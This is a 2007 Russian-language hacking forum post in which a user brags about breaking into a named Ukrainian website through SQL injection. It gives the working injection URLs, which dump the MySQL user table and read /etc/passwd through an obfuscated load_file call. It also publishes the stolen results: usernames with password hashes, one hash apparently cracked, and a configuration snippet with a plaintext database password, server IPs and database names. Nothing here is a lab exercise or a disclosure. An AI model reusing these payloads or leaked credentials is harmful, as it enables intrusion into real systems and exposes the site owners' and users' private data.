Показать сообщение отдельно

  #409  
Старый 06.02.2007, 04:06
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

нашел на 777.biz.ua инъекцию, а потом с огромной помощью c411k и _-[A.M.D]HiM@S-_ была добыта разнообразная инфа.

Код:
http://777.biz.ua/photo_big.php?id_p=-1686+union+select+1,2,concat(user,char(58),password),4,version(),6,7,8,9+from+mysql.user
http://777.biz.ua/photo_big.php?id_p=-1686+union+select+1,2,concat(user,char(58),password),4,version(),6,7,8,9+from+mysql.user+limit+4,3 
http://777.biz.ua/photo_big.php?id_p=-1686+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7,8,9+from+mysql.user/*
admin:kRX.3VVi1kp0Q
Anna:3uqauoqXBOygw
Lina:GkgDkPlYVkkiM:zaq1qaz
Tina:gpL6.5zhbQLic
Yuve:1EmcyGHTQK5xY
frukt:6fsFeWu7hSTzA
vini:ijZtKQgJtn7JM
luke:BWilMcUu7Zq.Y
bandit:_UWF9hYsfZlVY


хороший кусок конфига

$myCon['user']="frukt";
$myCon['password']="zaq1";
//$myCon['host']="82.144.221.59";
//$myCon['host']="213.186.114.123";
$myCon['host']="localhost";
$myCon['db']="777_db1";

главные базы

lucky\_mychat1
eximstats
horde
leechprotect
lucky\_db1


[+] _-[A.M.D]HiM@S-_
[+] c411k

Последний раз редактировалось Thanat0z; 22.02.2007 в 03:07..
 
Ответить с цитированием